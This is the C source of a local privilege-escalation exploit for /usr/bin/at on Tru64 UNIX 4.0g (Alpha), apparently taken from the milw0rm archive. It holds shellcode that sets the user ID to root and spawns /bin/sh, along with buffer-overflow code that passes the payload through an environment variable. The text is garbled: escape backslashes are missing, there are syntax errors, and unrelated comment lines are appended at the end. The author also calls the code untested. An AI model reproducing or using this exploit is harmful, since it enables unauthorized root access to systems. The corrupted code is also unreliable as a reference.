/*
* Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA]
*
* Author: Cody Tubbs (loophole of hhp).
* Site: www.hhp-programming.net
* Email: [email protected]
* Date: 2/1/2000.
*
* I made this without access to gdb, It's untested...
* may require modification, may require deletion, heh.
*
* Note: executable_stack must be on.
*/
#include <stdio.h>
#include <string.h>
#define OFFSET 0
#define ALLIGN 0
#define NOP "x1fx04xffx47"
#define DBUF 8000 // 5604+4+528? Manipulate if needed.
char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0);
"x30x15xd9x43x11x74xf0x47x12x14x02x42xfcxffx32"
"xb2x12x94x09x42xfcxffx32xb2xffx47x3fx26x1fx04"
"x31x22xfcxffx30xb2xf7xffx1fxd2x10x04xffx47x11"
"x14xe3x43x20x35x20x42xffxffxffxff"
"x30x15xd9x43x31x15xd8x43x12x04xffx47x40xffx1e"
"xb6x48xffxfexb7x98xffx7fx26xd0x8cx73x22x13x05"
"xf3x47x3cxffx7exb2x69x6ex7fx26x2fx62x73x22x38"
"xffx7exb2x13x94xe7x43x20x35x60x42xffxffxffxff";
//Taeho Oh shellcode.
//long get_sp(void){ __asm__("bis $31,$30,$0");}
void usage(char *arg) {
fprintf(stderr, "nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)");
fprintf(stderr, " local root exploit. [ALPHA] n";
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", arg);
fprintf(stderr, "Examp: %s 0n", arg);
fprintf(stderr, "Examp: %s 0 1n", arg);
exit(1);
}
main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[DBUF+1];
char *nop;
int i, offset, allign;
long address;
if(argc < 2){
usage(argv[0]);
}
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
//address = get_sp() - offset;
address = i& - offset;
if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}}
for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
nop=NOP;
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
//buffer[i]=nop[i%4];
buffer[i] = 0x1f;
buffer[++i] = 0x04;
buffer[++i] = 0xff;
buffer[++i] = 0x47;
}
memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"ATEX=",5);
putenv(buffer);
fprintf(stderr,"Return address %#x, offset: %d.n",address,offset);
execlp("/usr/bin/at","at", eipeip, 0);
}
// milw0rm.com [2001-03-02]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666